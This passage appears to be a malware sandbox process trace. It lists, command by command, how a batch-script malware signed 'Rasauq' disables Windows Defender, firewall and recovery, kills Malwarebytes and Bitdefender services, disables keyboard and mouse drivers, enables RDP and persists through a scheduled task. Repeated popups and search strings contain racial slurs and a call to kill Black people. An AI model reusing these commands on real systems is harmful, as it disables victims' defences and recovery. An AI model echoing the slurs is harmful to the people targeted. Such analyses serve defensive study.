  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7440
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7452
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7548
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7564
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7616
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7472
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5348
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8032
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7232
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7716
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7948
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7892
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7748
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7592
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8136
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7692
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5348
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7536
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7676
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8028
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7976
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7936
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5340
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7828
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5340
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8524
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8592
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8616
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8648
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:9012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:9028
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:9056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:9080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:9096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:9144
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:9160
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8588
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8596
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8620
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4368
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8456
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:9132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8936
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:9192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:9208
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8336
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8440
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:9056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:9024
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8456
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:9132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:9196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:9208
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:9152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7216
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8936
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:9132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:9144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:9140
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:3424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2392
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:1960
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:5504
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:4680
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:5672
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:4416
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:4424
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:6084
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:3448
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:3552
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5448
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:2876
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:2936
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2476
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      PID:3724
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      Launches sc.exe
      PID:3192
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:5748
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:972
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:1032
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:2320
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:6072
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:3056
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:5492
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:1136
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:1196
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:3604
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4856
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5996
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3776
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:2324
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:4428
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:3172
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:3984
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:5280
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:5900
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:1588
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:836
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:4624
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:4828
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:5708
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4284
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4332
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3128
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2844
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2344
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3944
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:5108
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:1504
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:5848
  - - C:\Windows\system32\net.exe
      net stop "SDRSVC"
      4⤵
      PID:4424
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SDRSVC"
        5⤵
        
        PID:6084
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:5868
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:3552
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im "MSASCui.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5188
  - - C:\Windows\system32\net.exe
      net stop "security center"
      4⤵
      PID:5400
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "security center"
        5⤵
        
        PID:3844
  - - C:\Windows\system32\netsh.exe
      netsh firewall set opmode mode-disable
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:888
  - - C:\Windows\system32\net.exe
      net stop "wuauserv"
      4⤵
      PID:6108
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wuauserv"
        5⤵
        
        PID:5468
  - - C:\Windows\system32\net.exe
      net stop "Windows Defender Service"
      4⤵
      PID:2752
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Defender Service"
        5⤵
        
        PID:3576
  - - C:\Windows\system32\net.exe
      net stop "Windows Firewall"
      4⤵
      PID:2112
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Firewall"
        5⤵
        
        PID:3636
  - - C:\Windows\system32\net.exe
      net stop sharedaccess
      4⤵
      PID:2144
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop sharedaccess
        5⤵
        
        PID:1460
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1648
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:3740
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5992
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:2544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4936
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4832
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1140
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5952
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:404
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5548
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5800
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      Launches sc.exe
      PID:4104
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:4284
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      PID:5904
  - - C:\Windows\system32\sc.exe
      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:2168
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      PID:3424
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      PID:4332
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:2440
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      Launches sc.exe
      PID:3160
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:4488
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:3672
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:3584
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:5696
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:8
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:6060
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:5460
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:2436
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1504
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1728
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5344
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2392
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2184
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3724
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5060
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5776
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6020
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      Launches sc.exe
      PID:424
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      Launches sc.exe
      PID:4060
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      Launches sc.exe
      PID:2276
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:1136
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
      4⤵
      PID:5208
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      PID:3636
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      Launches sc.exe
      PID:2112
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      PID:1460
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      Launches sc.exe
      PID:1756
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      Launches sc.exe
      PID:3740
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      Launches sc.exe
      PID:4548
